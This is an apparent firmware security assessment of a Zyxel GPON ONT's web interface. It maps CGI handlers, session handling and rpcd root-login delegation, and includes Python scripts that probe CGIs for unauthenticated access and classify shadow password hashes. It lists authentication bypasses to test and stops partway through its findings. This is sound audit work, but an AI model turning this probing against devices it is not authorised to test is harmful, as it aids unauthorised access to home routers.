Device: Zyxel AOT-5221ZY GPON ONT/ONU
Analysis Date: 2025-10-06
Web Root: /usr/shared/web/
- Executive Summary
- Web Server Architecture
- Web Interface Structure
- Page Organization
- CGI Backend Handlers (Complete List)
- Frontend Technologies
- Authentication & Session Management
- Security Analysis
- Frontend-Backend Validation Analysis
- API Endpoints
- Data Flow
- Vulnerabilities & Security Gaps
- Configuration Files
The Zyxel AOT-5221ZY web interface is a CGI-based system using:
- Web Server: mini_httpd (custom fork, version 1.30)
- Frontend: jQuery-based UI with JSON-driven dynamic pages
- Backend: 211 compiled C CGI binaries
- Data Model: TR-069/USP (InternetGatewayDevice) OID structure
- Session Management: Cookie-based with SessionKey validation
- Default Configuration: Movistar/Telefonica branding, Portuguese/English language
Total Web Components Found:
- 211 CGI binaries
- 38+ JSON tab definition files
- 50+ JavaScript files
- Hundreds of HTML fragments embedded in CGI binaries
Binary: /usr/bin/mini_httpd (78 KB)
Configuration Files (runtime):
- /etc/mini_httpd1.conf - Primary HTTP server
- /etc/mini_httpd2.conf - Secondary HTTP server (remote management)
- /etc/mini_httpd3.conf - Additional instance
- /etc/mini_httpd4.conf - Additional instance
PID Files:
- /tmp/mini_httpd1.pid
- /tmp/mini_httpd2.pid
- /tmp/mini_httpd3.pid
- /tmp/mini_httpd4.pid
Log Files:
- /tmp/mini_httpd%d.log (one per instance)
SSL Certificate:
- /etc/mycert/web.pem (3,146 bytes), symlinked as /usr/shared/web/httpsCert.pem (the web-root tree below records the link target as /etc/mycert/httpsCert.pem; confirm which name exists on the image)
Supported Methods:
- GET
- POST
Content Types:
- text/html; charset=ISO-8859-1
- text/html; charset=%s (configurable)
- text/plain; charset=%s
- application/log
- application/certification
- config/conf
CGI Support:
- CGI/1.1 interface
- Environment variables: GATEWAY_INTERFACE, SERVER_PROTOCOL, PATH_INFO
- Binary path: /usr/local/bin:/usr/ucb:/bin:/usr/bin:/usr/sbin
- Library path: /lib:/usr/lib:/lib/MSTC:/usr/lib/MSTC
Special Paths:
- /cgi-bin/ - Main CGI directory
- /mhs/APIS/ - Management API
- /mhs/jsps/ - JSP-style pages
- /pages/ - HTML page fragments
- /html/ - Static resources
Temporary Files:
- /tmp/.web_rcf - Web RCF (Runtime Configuration)
- /tmp/.webpipe - Web IPC pipe
- /tmp/TemporaryUseFile - Temporary upload storage
- /var/zerotouch.json - Zero-touch provisioning data
/usr/shared/web/
├── html/ # Frontend static files
│ ├── index.html # Entry point (redirects to indexmain.cgi)
│ ├── loginsum.html # Login summary page
│ ├── bgiframe.htm # Background iframe
│ ├── config.json # Application configuration
│ ├── css/ # Stylesheets
│ ├── js/ # JavaScript files (50+ files)
│ ├── images/ # Image assets
│ ├── style/ # Theme styles
│ │ └── Zyxel/ # Zyxel branding theme
│ └── pages/ # Page definitions
│ ├── network/
│ ├── security/
│ ├── maintenance/
│ ├── voip/
│ ├── systemMonitoring/
│ ├── tabFW/
│ └── VD/
├── cgi-bin/ # Backend CGI binaries (211 files)
│ ├── indexmain.cgi # Main dashboard
│ ├── login_advance.cgi # Login handler
│ ├── logout_advance.cgi # Logout handler
│ ├── menuJson.cgi # Menu structure provider
│ └── [208 more CGI binaries]
├── TabJson/ # Tab configuration storage
├── httpsCert.pem -> /etc/mycert/httpsCert.pem
├── romfile.cfg -> /var/config.cfg
├── romd.cfg -> /tmp/mrdcert
├── System.log -> /var/log/System.log
├── ExtractLog.tar.gz -> /tmp/ExtractLog.tar.gz
└── zerotouch.json -> /var/zerotouch.json
The web interface is organized into major functional categories:
Network (html/pages/network/) sub-sections:
- Broadband - WAN connectivity, PPPoE, DHCP, 3G backup
  - Handler: broadband.cgi
  - JSON: network/broadband/tab.json
  - Features: Connection management, 3G fallback support
- Home Networking - LAN, DHCP server, IP configuration
  - Handlers: lanSetup.cgi, ipv6LanSetup.cgi
  - JSON: network/homeNetworking/tab.json, tab_QInQ.json, tab_no_USB.json
  - Features: IPv4/IPv6 dual-stack, QinQ VLAN support
- Wireless - 2.4GHz WiFi settings
  - Handlers: wlan_general.cgi, wlan_MACAuthentication.cgi, wlan_wps.cgi
  - JSON: network/wireless/tab.json, tab_no_Scheduling.json
  - Features: WPS, MAC filtering, guest networks
- Wireless 5G - 5GHz WiFi settings
  - Handlers: wlan5_general.cgi, wlan5_MACAuthentication.cgi, wlan5_wps.cgi
  - JSON: network/wireless5G/tab.json
- Wireless EasyMesh - WiFi mesh networking
  - Handler: EasyMesh.cgi
  - JSON: network/wirelessEasyMesh/tab.json
  - Features: IEEE 1905.1 Multi-AP coordination
- Wireless Scheduling - Time-based WiFi control
  - Handlers: wlan_scheduling.cgi, wlan_schedule_add.cgi
  - JSON: network/wirelessScheduling/tab.json
- QoS - Quality of Service
  - Handlers: qos_general.cgi, qos_class.cgi, qos_queue.cgi, qos_shaper.cgi
  - JSON: network/qos/tab.json
  - Features: Traffic prioritization, bandwidth shaping
- NAT - Network Address Translation
  - Handlers: NAT_General.cgi, NAT_AddrMapping.cgi, portForwarding.cgi, dmz.cgi
  - JSON: network/nat/tab.json
  - Features: Port forwarding, port triggering, DMZ, address mapping
- Routing - Static routes, DNS routing
  - Handlers: static.cgi, dns_routing.cgi
  - JSON: network/routing/tab.json
  - Features: IPv4/IPv6 static routes, policy routing
- Port Binding - VLAN/port association
  - Handler: portbinding.cgi (inferred)
  - JSON: network/portbinding/tab.json
- Tunnel - GRE tunnels, IP tunnels
  - Handlers: gretunnel.cgi, ipTunnel.cgi
  - JSON: network/tunnel/tab.json, tab_gre_tunnel.json
- VPN Server - VPN service configuration
  - Handler: VPN-related CGIs (inferred)
  - JSON: network/VPNServer/tab.json
Security (html/pages/security/) sub-sections:
- Firewall - Firewall rules and policies
  - Handlers: Multiple TELFirewall_*.cgi and TR181Firewall_*.cgi
  - JSON: security/firewall/tab.json, security/TEF181firewall/tab.json, security/TR181firewall/tab.json
  - Features: Stateful packet inspection, DoS protection
  - Note: Multiple firewall implementations (legacy TEL, TR-181 compliant)
- Filter - MAC/IP filtering
  - Handlers: IP_MAC_Filter.cgi, ipMacFilterList.cgi
  - JSON: security/filter/tab.json
- URL Filter - Web content filtering
  - Handlers: URL_Filter.cgi, URL_Filter_Edit.cgi, Keyword_Filter_list.cgi
  - JSON: security/urlfilter/tab.json
  - Features: Keyword blocking, domain filtering
- Parental Control - Time-based access control
  - Handlers: ParentalControl.cgi, ParentalControladd.cgi
  - JSON: security/parentalcontrol/tab.json
- Certificates - SSL/TLS certificate management
  - Handlers: localCA.cgi, trustedCA.cgi, sshCA_list.cgi
  - JSON: security/certificates/tab.json
  - Features: Local CA, trusted CA, SSH key management
VoIP (html/pages/voip/) sub-sections:
- SIP - SIP service provider settings
  - Handlers: sipServiceProvider.cgi, sipServiceProvider_setting.cgi, SIP_ALG.cgi
  - JSON: voip/sip/tab.json
- Phone - VoIP phone configuration
  - Handler: phone.cgi
  - JSON: voip/phone/tab.json
  - Features: FXS port configuration, codec settings
- Call Rules - Call routing and rules
  - Handlers: callRule.cgi, callRule_CO.cgi
  - JSON: voip/callrule/tab.json, tab_Unify_CO.json
- Call History - Call logs and records
  - Handler: Call history CGI (inferred)
  - JSON: voip/callhistory/tab.json
System Monitoring (html/pages/systemMonitoring/) sub-sections:
- Traffic Status - Network traffic statistics
  - Handlers: traffic_wan.cgi, traffic_lan.cgi, traffic_nat.cgi
  - JSON: systemMonitoring/trafficStatus/tab.json
- Log - System log viewer
  - Handlers: viewlog.cgi, ViewSyslog.cgi
  - JSON: systemMonitoring/log/tab.json
- VoIP Status - VoIP connection status
  - Handlers: VoIPStatus.cgi, VoIPStatus_list.cgi
  - JSON: systemMonitoring/VoIPStatus/tab.json
Maintenance (html/pages/maintenance/) sub-sections:
- Remote Management - Remote access configuration
  - Handlers:
    - RemMagGeneral.cgi - General remote management
    - RemMagWWW.cgi - Web interface access
    - RemMagWWW4Airtel.cgi - Airtel-specific web access
    - RemMagSNMP.cgi - SNMP configuration
    - RemMagDNS.cgi - DNS configuration
    - RemMagICMP.cgi - ICMP (ping) configuration
    - RemMagSSH.cgi - SSH access
    - RemMagTELNET.cgi - Telnet access
  - JSON: maintenance/remotemgmt/tab.json, tab4Airtel.json, noSSH.json
  - Features: Multi-protocol remote access control
- Device Configuration - Backup/restore, factory reset
  - Handlers: backupRestore.cgi, reboot.cgi
  - JSON: maintenance/deviceConfiguration/tab.json
- Diagnostic - Network diagnostics
  - Handlers: DiagGeneral.cgi, ping.cgi, mirror.cgi
  - JSON: maintenance/disagnostic/tab.json (sic)
  - Features: Ping, traceroute, port mirroring
- Log Settings - Logging configuration
  - Handler: logSet.cgi
  - JSON: maintenance/logSetting/tab.json
Other page groups (html/pages/tabFW/, html/pages/VD/):
- tabFW - Framework/template pages
  - Handler: tabFW.cgi
  - JSON: tabFW/tab.json
- VD (Vendor Customization) - Vendor-specific branding
  - Handlers: vd.cgi, vdview.cgi
  - Variants: P-660HNU-F1 specific customization
Login/Authentication:
- login_advance.cgi - Main login handler
- logout_advance.cgi - Logout handler
- passLogout.cgi - Password logout
- doregister.cgi - Registration handler
- clear_first_access.asp - First access flag clear
Main Interface:
- indexmain.cgi - Main dashboard/homepage
- menuJson.cgi - Dynamic menu generation
- naviView_partialLoad.cgi - Navigation partial loading
- info.cgi - System information
- current.cgi - Current status
- statusview.cgi - Status view
- networkMap.cgi - Network topology map
Network - Broadband/WAN:
- broadband.cgi - WAN configuration
- connection_icon_list.cgi - Connection status icons
- connection_table_list.cgi - Connection table
- connectionStatus_p1.cgi - Connection status page 1
- wanRemoteNode_ETH_Edit.cgi - Ethernet WAN edit
- wanRemoteNode_GPON_Edit.cgi - GPON WAN edit
Network - LAN:
- lanSetup.cgi - LAN configuration (IPv4)
- ipv6LanSetup.cgi - LAN configuration (IPv6)
- dhcp_static_list.cgi - DHCP static leases list
- staticDHCP_add.cgi - Add DHCP static lease
- staticDHCP.cgi - DHCP static configuration
Network - Wireless 2.4GHz:
- wlan_general.cgi - General WiFi settings
- wlan_MACAuthentication.cgi - MAC authentication
- wlan_macfilter_add.cgi - Add MAC filter
- wlan_macfilter_edit.cgi - Edit MAC filter
- wlan_mac_address_list.cgi - MAC address list
- wlan_mac_address_list1.cgi - MAC list (radio 1)
- wlan_mac_address_list2.cgi - MAC list (radio 2)
- wlan_mac_address_list3.cgi - MAC list (radio 3)
- wlan_moreAP.cgi - Multi-AP/Guest network
- wlan_moreap_edit.cgi - Edit multi-AP
- wlan_others.cgi - Other wireless settings
- wlan_wps.cgi - WPS configuration
- wlan_wpsinfo.cgi - WPS information
- wlan_WpsStatus.cgi - WPS status
- wlan_WPStimerRunning.cgi - WPS timer status
- wlan_staionInfo.cgi - Station information (filename misspelled in the image)
- wlan_staionInfo_list.cgi - Station list
- wlan_staionInfo_list1.cgi - Station list (radio 1)
- wlan_staionInfo_list2.cgi - Station list (radio 2)
- wlan_staionInfo_list3.cgi - Station list (radio 3)
- moreApStatus.cgi - Multi-AP status
Network - Wireless 5GHz:
- wlan5_general.cgi - 5GHz general settings
- wlan5_MACAuthentication.cgi - 5GHz MAC auth
- wlan5_macfilter_add.cgi - Add 5GHz MAC filter
- wlan5_macfilter_edit.cgi - Edit 5GHz MAC filter
- wlan5_mac_address_list.cgi - 5GHz MAC list
- wlan5_mac_address_list1.cgi - 5GHz MAC list (radio 1)
- wlan5_mac_address_list2.cgi - 5GHz MAC list (radio 2)
- wlan5_mac_address_list3.cgi - 5GHz MAC list (radio 3)
- wlan5_moreAP.cgi - 5GHz multi-AP
- wlan5_moreap_edit.cgi - Edit 5GHz multi-AP
- wlan5_others.cgi - Other 5GHz settings
- wlan5_wps.cgi - 5GHz WPS
- wlan5_wpsinfo.cgi - 5GHz WPS info
- wlan5_WpsStatus.cgi - 5GHz WPS status
- wlan5_WPStimerRunning.cgi - 5GHz WPS timer
- wlan5_staionInfo.cgi - 5GHz station info
- wlan5_staionInfo_list.cgi - 5GHz station list
- wlan5_staionInfo_list1.cgi - 5GHz station list (radio 1)
- wlan5_staionInfo_list2.cgi - 5GHz station list (radio 2)
- wlan5_staionInfo_list3.cgi - 5GHz station list (radio 3)
Network - Wireless Scheduling:
- wlan_scheduling.cgi - WiFi schedule
- wlan_schedule_add.cgi - Add schedule
- wlan_schedule_edit.cgi - Edit schedule
- wlan_schedule_delete.cgi - Delete schedule
- schedule_list.cgi - Schedule list
Network - EasyMesh:
- EasyMesh.cgi - EasyMesh configuration
Network - QoS:
- qos_general.cgi - QoS general settings
- qos_class.cgi - QoS classification
- qos_queue.cgi - QoS queue management
- qos_shaper.cgi - Traffic shaping
- qos_class_add.cgi - Add QoS class
- queue_add.cgi - Add queue
- shaper_add.cgi - Add shaper
Network - NAT:
- NAT_General.cgi - NAT general settings
- NAT_AddrMapping.cgi - Address mapping
- nat.cgi - NAT configuration
- portForwarding.cgi - Port forwarding
- portForwarding_add.cgi - Add port forward
- portForwarding_edit.cgi - Edit port forward
- port_forwarding_list.cgi - Port forward list
- port_forwarding_delete.cgi - Delete port forward
- portTriggering.cgi - Port triggering
- portTriggering_add.cgi - Add port trigger
- portTriggering_edit.cgi - Edit port trigger
- port_Triggering_list.cgi - Port trigger list
- dmz.cgi - DMZ host configuration
- addrMap_add.cgi - Add address mapping
Network - Routing:
- static.cgi - Static routes
- static_route_list.cgi - Static route list
- static_add.cgi - Add static route
- ipv6static.cgi - IPv6 static routes
- ipv6static_add.cgi - Add IPv6 static route
- ipv6_static_route_list.cgi - IPv6 route list
- dns_routing.cgi - DNS routing
- dns_routing_add.cgi - Add DNS route
- dns_route_list.cgi - DNS route list
Network - Tunnel:
- gretunnel.cgi - GRE tunnel config
- gretunnel_add.cgi - Add GRE tunnel
- gretunnel_list.cgi - GRE tunnel list
- ipTunnel.cgi - IP tunnel config
Network - Other:
- dynamicDNS_InadynV2.cgi - Dynamic DNS (Inadyn v2)
- dynamicDNS_InterfaceIndex.cgi - DDNS interface
- ipalias.cgi - IP alias configuration
- upnp.cgi - UPnP configuration
- current_upnp_table.cgi - Current UPnP mappings
Security - Firewall:
- TELFirewall_general.cgi - TEF firewall general
- TELFirewall_DoS.cgi - DoS protection
- TELFirewall_DoS_Adv.cgi - Advanced DoS
- TELFirewall_FrwlEdit.cgi - Edit firewall
- TELFirewall_RuleEdit.cgi - Edit rule
- TELFirewall_RuleSIndex.cgi - Rule index
- TELFirewall_RuleSum.cgi - Rule summary
- TELFirewall_RuleSum_frame.cgi - Rule summary frame
- TELFirewall_RuleTable.cgi - Rule table
- TELFirewall_Table.cgi - Firewall table
- TELFirewall_InterfaceIndex.cgi - Interface index
- TELFirewall_IntfDirIndex.cgi - Interface direction
- TELFirewall_ServiceIndex.cgi - Service index
- TR181Firewall.cgi - TR-181 firewall
- TR181Firewall_RuleEdit.cgi - TR-181 rule edit
Security - Filter:
- IP_MAC_Filter.cgi - IP/MAC filtering
- ipMacFilterList.cgi - IP/MAC filter list
- URL_Filter.cgi - URL filtering
- URL_Filter_Edit.cgi - Edit URL filter
- URL_Filter_list.cgi - URL filter list
- URL_Filter_delete.cgi - Delete URL filter
- Keyword_Filter_list.cgi - Keyword filter list
Security - Parental Control:
- ParentalControl.cgi - Parental control
- ParentalControladd.cgi - Add parental control
- ParentalControl_view.cgi - View parental control
Security - Certificates:
- localCA.cgi - Local CA management
- localCA_frame.cgi - Local CA frame
- trustedCA.cgi - Trusted CA management
- trustedCA_add.cgi - Add trusted CA
- trustedCA_view.cgi - View trusted CA
- sshCA_list.cgi - SSH CA list
VoIP - SIP:
- sipServiceProvider.cgi - SIP provider config
- sipServiceProvider_setting.cgi - SIP provider settings
- sipServiceProvider_list.cgi - SIP provider list
- sipAccount.cgi - SIP account config
- sipAccount_setting.cgi - SIP account settings
- sipAccount_list.cgi - SIP account list
- SIP_ALG.cgi - SIP ALG configuration
VoIP - Phone:
- phone.cgi - Phone configuration
VoIP - Call Rules:
- callRule.cgi - Call rules
- callRule_CO.cgi - Call rules (CO variant)
VoIP - Status:
- VoIPStatus.cgi - VoIP status
- VoIPStatus_list.cgi - VoIP status list
System Monitoring - Traffic:
- traffic_wan.cgi - WAN traffic
- traffic_wan_frame1.cgi - WAN traffic frame 1
- traffic_wan_frame2.cgi - WAN traffic frame 2
- traffic_lan.cgi - LAN traffic
- traffic_lan_frame.cgi - LAN traffic frame
- traffic_nat.cgi - NAT traffic
System Monitoring - Logs:
- viewlog.cgi - View logs
- ViewSyslog.cgi - View syslog
Maintenance - Remote Management:
- RemMagGeneral.cgi - General remote mgmt
- RemMagWWW.cgi - Web remote access
- RemMagWWW4Airtel.cgi - Web access (Airtel)
- RemMagSNMP.cgi - SNMP configuration
- RemMagDNS.cgi - DNS configuration
- RemMagICMP.cgi - ICMP/Ping configuration
- RemMagSSH.cgi - SSH access
- RemMagTELNET.cgi - Telnet access
Maintenance - Device Config:
- backupRestore.cgi - Backup/restore
- reboot.cgi - Reboot device
- rebootinfo.cgi - Reboot information
- system.cgi - System configuration
- time.cgi - Time/NTP configuration
Maintenance - Diagnostics:
- DiagGeneral.cgi - General diagnostics
- ping.cgi - Ping tool
- mirror.cgi - Port mirroring
Maintenance - Logs:
- logSet.cgi - Log settings
- zlog.cgi - Zlog configuration
Maintenance - Firmware:
- firewareUpgrade.cgi - Firmware upgrade (typo in original)
- Fireware_UpgradesManaged.cgi - Managed firmware upgrade
TR-069/USP Management:
- tr69cfg.cgi - TR-069 configuration
- tr369.cgi - TR-369/USP configuration
- agentMTP.cgi - USP agent MTP
- agentMTP_list.cgi - USP agent MTP list
- controller.cgi - USP controller
- controller_list.cgi - USP controller list
- stompConn.cgi - STOMP connection
- stompConn_list.cgi - STOMP connection list
- mqttClient.cgi - MQTT client
- mqttClient_list.cgi - MQTT client list
File Sharing:
- fileSharing.cgi - File sharing config
- fileSharing_add.cgi - Add file share
- fileSharing_mod.cgi - Modify file share
- fileSharing_del.cgi - Delete file share
- fileSharing_list.cgi - File share list
- fileSharing_browse.cgi - Browse file shares
- fileuser_add.cgi - Add file user
- fileuser_mod.cgi - Modify file user
- fileuser_del.cgi - Delete file user
- fileuser_list.cgi - File user list
- printServer.cgi - Print server config
User Management:
- userAccount.cgi - User account management
PCP (Port Control Protocol):
- PCP_ClientListIndex.cgi - PCP client list
- PCP_ClientListIndex_view.cgi - PCP client view
- PCP_list.cgi - PCP list
- pcplist.cgi - PCP list (alternate)
GPON Specific:
- gponPassword.cgi - GPON password config
Vendor/Custom:
- vd.cgi - Vendor customization
- vdview.cgi - Vendor view
- tabFW.cgi - Tab framework
Utility/Framework:
- delete.cgi - Generic delete handler
- delete_RuleSum.cgi - Delete rule summary
- autofw_notify.asp - Auto-forward notification
- autofw_notify_check.asp - Auto-forward check
Core Libraries:
- jQuery 1.3.2 (jquery-1.3.2.min.js)
- jQuery 1.6.3 (jquery-1.6.3.min.js)
- jQuery 3.6.0 (jquery-3.6.0.min.js)
- jQuery 3.6.3 (jquery-3.6.3.min.js)
- jQuery Migrate 1.4.1 (compatibility layer)
⚠️ Four jQuery builds ship in the web root. Which build a given page loads decides whether the legacy 1.x selector behaviour discussed under Security Analysis applies to that page, so record the script tags per page rather than assuming the newest build is in use.
jQuery UI:
- jquery-ui-1.7.2.custom.min.js
- jquery-ui-dialog.min.js
- jquery-ui-slider.min.js
jQuery Plugins:
- jquery.tablesorter.min.js - Table sorting
- jquery.validate.pack.js - Form validation
- jquery.cookie.js - Cookie management
- jquery.tooltip.min.js - Tooltips
- jquery.simplemodal-1.3.min.js - Modal dialogs
- jquery.clickmenu.pack.js - Click menus
- jquery.bgiframe.pack.js - IE6 iframe fix
- jquery.pngFix.pack.js - PNG transparency fix
- jquery.layout.js - Page layout
- jquery.easing.1.3.js - Animation easing
- jquery.mousewheel.js - Mouse wheel support
- jquery.getParams.js - URL parameter parsing
- jquery.jgrowl.joze_mini.js - Notifications
- jquery.watermarkinput.js - Input placeholders
- jquery.text-overflow.js - Text truncation
- jquery.tools.min_tab.js - Tab interface
- jquery.zyCheckTree.js - Zyxel custom tree component
Custom Zyxel JavaScript:
- zyjs/ - Zyxel JavaScript library directory
- zyJqFunctions.js - Zyxel jQuery extensions
- zyMacUi.js - MAC address UI components
- zyMask.js - Input masking
- zyUiDialog.js - Custom dialogs
Application Logic:
- common.js - Common utilities
- functions.js - General functions
- General.js - General application logic
- javascript.js - Main application code
- jsonParser.js - JSON parsing
- jsl.js - JavaScript library extensions
- util.js - Utility functions
- security.js - Security functions
- wireless.js - Wireless-specific logic
- VD.js - Vendor customization logic
- portDef.js - Port definitions
- TimeZone.js - Timezone handling
- switch.js - Switch/toggle components
- ip_new.js - IP address handling
- loadingMask.js - Loading overlays
- userSwitchPanel.js - User switching
- Multi_Language.js - Internationalization
Framework Components:
- brickRichMenu.js - Menu component
- iframe.jquery.js - iframe utilities
- tools.scrollable-1.1.0.min.js - Scrolling
Location: /usr/shared/web/html/css/
Themes:
- Zyxel branding theme in /style/Zyxel/
- Movistar branding (default per config.json)
Supported Languages:
- English (en) - language.en.json
- Portuguese (pt) - language.pt.json (default)
Default Configuration:
- Language: Portuguese
- Branding: Movistar (Telefonica Spain/Latin America)
- Country: ES (Spain)
Entry Point:
- User accesses /index.html
- Redirects to /cgi-bin/indexmain.cgi
- If not authenticated, redirects to /cgi-bin/login_advance.cgi
- Login page displays login form
Login Handler: login_advance.cgi
Login Process:
User Input (username/password)
↓
POST to login_advance.cgi
↓
Backend validation (libwebutil.so)
↓
Check username/password against:
- /etc/config/rpcd (root user)
- Virtual user database
- PAM authentication
↓
If valid:
- Generate SessionKey
- Set HTTP cookie (session=SessionKey)
- Store session in /tmp/session_*
- Redirect to indexmain.cgi
↓
If invalid:
- Return to login page with error
Session Cookie:
- Name: session
- Value: SessionKey (random token)
- Path: /
- Secure: HTTPS only (if configured)
Session Functions (libwebutil.so):
Session Creation:
- cgiValidateAddSessionKey - Add new session
- cgiHeaderCookieSetString - Set cookie header
- cgiGetCurrSessionKey - Get current session key
Session Validation:
- cgiSessionCheck - Validate session on each request
- cgiValidateLocalSessionKey - Validate local session
- CookieGet - Get cookie value
- getSessionFilePathFromCookie - Resolve session file
Session Cleanup:
- cgiSessionClean - Clean expired sessions
Session Storage:
- Session files likely in /tmp/session_* or /var/run/
- Contains: SessionKey, CurrSessionTime, SessionIP
Session Timeout:
- Configured in config.json: "SessionMaxTime": 600 (10 minutes)
- Warning before timeout: "SessionWarning": false (disabled)
Session Security:
- IP address validation (SessionIP)
- Timestamp validation (CurrSessionTime)
- SessionKey randomness check
- Automatic lockout: SessionLockedState, SessionLockedTime
Paths Checked:
- /cgi-bin/login_advance.cgi - Login required
- /cgi-bin/logout_advance.cgi - Always accessible
- Static resources (css, js, images) - Typically no auth required
- Error pages - No auth required
Potential Bypasses (to test):
- Direct CGI access without session cookie
- Session fixation attacks
- CSRF token absence
- Cookie tampering
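The first two bypass checks above (direct CGI access without a session cookie, and what the cookie itself looks like) can be run in one pass. The script below is an added example for this report, not code from the device or from Zyxel. It assumes the device answers at BASE_URL, that an unauthenticated request to a protected handler is answered either with a redirect to login_advance.cgi or with the login form, that the cookie is named session as described above, and that the device certificate does not chain to a public CA (so verification is turned off for the probe only).

```python
"""Unauthenticated-access and cookie-attribute probe for the CGI inventory.

Added example for this report, not code shipped on the device.
Assumptions: BASE_URL, the login-redirect / login-form heuristics in
classify_response(), and that the session cookie is called 'session'.
"""
import ssl
import urllib.error
import urllib.request

BASE_URL = "https://192.168.1.1"          # assumption: LAN-side management address
# A few handlers from the inventory whose unauthenticated exposure would matter most.
SENSITIVE_CGIS = ["indexmain.cgi", "RemMagTELNET.cgi", "backupRestore.cgi",
                  "firewareUpgrade.cgi", "userAccount.cgi", "viewlog.cgi"]


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx so the Location header can be inspected."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify_response(status, headers, body):
    """Map one response to: login-redirect, login-form, denied, exposed, other."""
    location = headers.get("Location", "")
    if status in (301, 302, 303, 307, 308) and "login_advance.cgi" in location:
        return "login-redirect"
    if status in (401, 403):
        return "denied"
    if status == 200:
        lower = body.lower()
        if "login_advance.cgi" in lower and "password" in lower:
            return "login-form"
        return "exposed"        # 200 with page content and no login form: the finding
    return "other"


def cookie_missing_flags(set_cookie):
    """Return the hardening attributes absent from a Set-Cookie header value."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in set_cookie.split(";")[1:]}
    return [flag for flag in ("secure", "httponly", "samesite") if flag not in attrs]


def fetch(url, timeout=5):
    """GET without any cookie; return (status, headers, body-text). 3xx/4xx/5xx are returned, not raised."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False              # assumption: self-signed device certificate
    ctx.verify_mode = ssl.CERT_NONE
    opener = urllib.request.build_opener(NoRedirect, urllib.request.HTTPSHandler(context=ctx))
    req = urllib.request.Request(url, headers={"User-Agent": "cgi-probe"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers, resp.read().decode("latin-1", "replace")
    except urllib.error.HTTPError as err:   # with NoRedirect, 3xx land here as well
        return err.code, err.headers, err.read().decode("latin-1", "replace")


def probe(base_url=BASE_URL, names=SENSITIVE_CGIS):
    """Classify each CGI reached without a session; grade any cookie the device sets."""
    report = {}
    for name in names:
        status, headers, body = fetch(f"{base_url}/cgi-bin/{name}")
        verdict = classify_response(status, headers, body)
        if "Set-Cookie" in headers:
            missing = cookie_missing_flags(headers["Set-Cookie"])
            verdict += " (cookie lacks: %s)" % (", ".join(missing) or "nothing")
        report[name] = verdict
    return report


if __name__ == "__main__":
    for cgi, verdict in probe().items():
        print(f"{cgi:32s} {verdict}")
```

Any handler reported as exposed is a candidate for the missing-cgiSessionCheck() case; re-test it with POST as well, since some handlers only act on POST.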
From rpcd config (/etc/config/rpcd):
```
config login
	option username 'root'
	option password '$p$root'
	list read '*'
	list write '*'
```
Username: root
Password: the value $p$root is not a hash. In OpenWrt's rpcd, a password option of the form $p$<user> tells rpcd to verify the supplied password against the system account <user> in /etc/shadow. The web/ubus login for this entry is therefore the root system password.
Actual Password:
- Not stored in the rpcd config; its hash (if any) lives in the root line of /etc/shadow, which this analysis did not recover
- Set during provisioning or first login
- May default to device-specific value (serial number, etc.)
- Check: extract /etc/shadow from the image and read the root field (empty = passwordless login; a '!' or '*' prefix = locked; $1$ = md5crypt; $5$/$6$ = sha256/sha512crypt; $y$ = yescrypt)
Permissions:
- Full read access: '*'
- Full write access: '*'
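Because $p$root delegates to the shadow file, the check a reviewer actually needs is on the root line of /etc/shadow from the firmware extract. The script below is an added example for this report, not code from the device; the rpcd decoding rule is OpenWrt's, the shadow lines are constructed samples, and the judgements attached to each hash prefix are the author's.

```python
"""What '$p$root' points at: classify the root entry of an extracted /etc/shadow.

Added example for this report, not code from the device. In OpenWrt's rpcd a
login password option written as $p$<user> means "verify against the system
password of <user>", so the strength of the web login is whatever the root
line of /etc/shadow holds. The shadow lines below are constructed samples.
"""
import re

# crypt(3) identifiers and a one-line judgement; anything else is reported as unknown.
HASH_TYPES = {
    "$1$": "md5crypt (fast; cheap to brute-force offline)",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt", "$6$": "sha512crypt",
    "$7$": "scrypt", "$y$": "yescrypt",
}


def rpcd_password_source(option_value):
    """Decode an rpcd 'option password' value into (source, detail)."""
    if option_value.startswith("$p$"):
        return ("system-account", option_value[3:])    # e.g. ('system-account', 'root')
    return ("inline-crypt-hash", option_value)        # a literal crypt(3) hash in the config


def classify_shadow_field(field):
    """Judge the password field of one /etc/shadow line."""
    if field == "":
        return "EMPTY: login succeeds with an empty password"
    if field.startswith(("!", "*")):
        return "LOCKED: password authentication disabled for this account"
    for prefix, verdict in HASH_TYPES.items():
        if field.startswith(prefix):
            return verdict
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "traditional DES crypt (8-char password limit; weak)"
    return "unknown format: " + field[:8]


def root_password_status(shadow_text):
    """Find the root line in shadow text and classify its password field."""
    for line in shadow_text.splitlines():
        parts = line.split(":")
        if len(parts) >= 2 and parts[0] == "root":
            return classify_shadow_field(parts[1])
    return "no root entry"


# Constructed samples covering the cases a firmware extract can contain.
SAMPLE_SHADOW_EMPTY = "root::0:0:99999:7:::\n"
SAMPLE_SHADOW_MD5 = "root:$1$saltsalt$qJH7.N4xYta3aEG/dfqo/0:0:0:99999:7:::\n"
SAMPLE_SHADOW_LOCKED = "root:!:0:0:99999:7:::\n"

if __name__ == "__main__":
    print(rpcd_password_source("$p$root"))
    for sample in (SAMPLE_SHADOW_EMPTY, SAMPLE_SHADOW_MD5, SAMPLE_SHADOW_LOCKED):
        print(root_password_status(sample))
```

Run root_password_status() on the real /etc/shadow from the squashfs; an EMPTY or md5crypt result turns the unverified row in the severity table below into a confirmed finding.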
✅ Session-Based Authentication
- Cookie-based sessions with SessionKey
- IP address binding
- Timeout enforcement (10 minutes default)
- Session locking mechanism
✅ HTML Escaping
- escape_html() function in libwebutil
- cgiHtmlEscape() for CGI output
- escapeBackslash4JS() for JavaScript context
✅ HTTPS Support
- SSL certificate: /etc/mycert/web.pem
- mini_httpd supports HTTPS
✅ Access Control
- Per-user read/write permissions (rpcd)
- Login privilege management (OID: LoginPrivilegeMgmt)
✅ Input Validation
- check_value() function
- checkUsedLanguage() for language validation
- checkTimeOut() for session timeout
✅ Anti-Automation
- Session locking after failed attempts (SessionLockedState/SessionLockedTime strings present; the attempt threshold and lock duration were not verified)
- Timeout enforcement
❌ Web Login Is the Root System Password
- rpcd config uses $p$root, which in OpenWrt's rpcd means "check against the system password of user root" (an /etc/shadow lookup), not a stored hash
- Strength depends entirely on that shadow entry, which this analysis did not recover
